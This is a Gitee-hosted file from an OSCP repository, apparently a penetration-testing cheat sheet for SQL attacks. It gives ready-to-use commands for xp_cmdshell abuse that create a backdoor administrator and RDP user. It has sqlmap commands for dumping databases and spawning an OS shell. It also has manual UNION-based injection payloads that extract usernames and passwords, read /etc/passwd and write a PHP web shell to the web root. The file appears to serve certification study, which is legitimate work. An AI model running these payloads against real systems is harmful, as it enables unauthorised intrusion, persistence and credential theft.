登录 注册
开源 企业版 高校版 私有云 Gitee AI NEW
扫描微信二维码支付
取消
支付完成
Watch
不关注 关注所有动态 仅关注版本发行动态 关注但不提醒动态
1 Star 0 Fork 1

arvind/OSCP

forked from 疯子/OSCP 
代码 Issues 0 Pull Requests 0 Wiki 统计 流水线
服务
加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
项目仓库所选许可证以仓库主分支所使用许可证为准
克隆/下载
SQL 2.39 KB
一键复制 编辑 原始数据 按行查看 历史
Busra Demir 提交于 2019-01-12 21:56 . Update SQL
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677


SQSH



#Login

sqsh -S <targetip>:<port> -U sa -P password



# commands

exec xp_cmdshell 'whoami'

go

exec xp_cmdshell 'net user kalisa pass /add'

go

exec xp_cmdshell 'net localgroup Administrators kalisa /add'

go

exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add'

go



------------------------------



SQLMAP

# Crawl the links

sqlmap -u http://<targetip> --crawl=1

sqlmap -u http://<targetip> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3



# Search for databases

sqlmap –u http://<targetip>/index.php?par= –dbs



# dump tables from database 

sqlmap –u http://<targetip>/index.php?par= –dbs –D dbname –tables –-dump

sqlmap –u http://<targetip>/index.php?par= –dbs –D dbname –T tablename –-dump



# OS Shell

sqlmap -u http://<targetip>/comment.php?id=738 --dbms=mysql --osshell



--------------------------------



Manual sql injection commands



# check for sqli vulnerability

?id=1'



# find the number of columns

?id=1 order by 9 -- -



# Find space to output db

?id=1 union select 1,2,3,4,5,6,7,8,9 -- -



# Get username of the sql-user

?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -



# Get version

?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -



# Get all tables

?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -



# Get all columns from a specific table

?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -



# Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)

?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users



# read file

?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -

?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -



# create a file and call it to check if really created

?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -

?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -

	

# create a file to get a shell

?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -

?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -



# then go to browser and see if you can execute commands

http://<targetip>/shell.php?cmd=id



# Then use Pentest Monkey Reverse Shells to call your shell
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
Python
1
https://gitee.com/arvindj/OSCP.git
git@gitee.com:arvindj/OSCP.git
arvindj
OSCP
OSCP
master
点此查找更多帮助

搜索帮助

Git 命令在线学习 如何在 Gitee 导入 GitHub 仓库
Git 仓库基础操作
企业版和社区版功能对比
SSH 公钥设置
如何处理代码冲突
仓库体积过大,如何减小?
如何找回被删除的仓库数据
Gitee 产品配额说明
GitHub仓库快速导入Gitee及同步更新
什么是 Release(发行版)
将 PHP 项目自动发布到 packagist.org
评论
仓库举报
回到顶部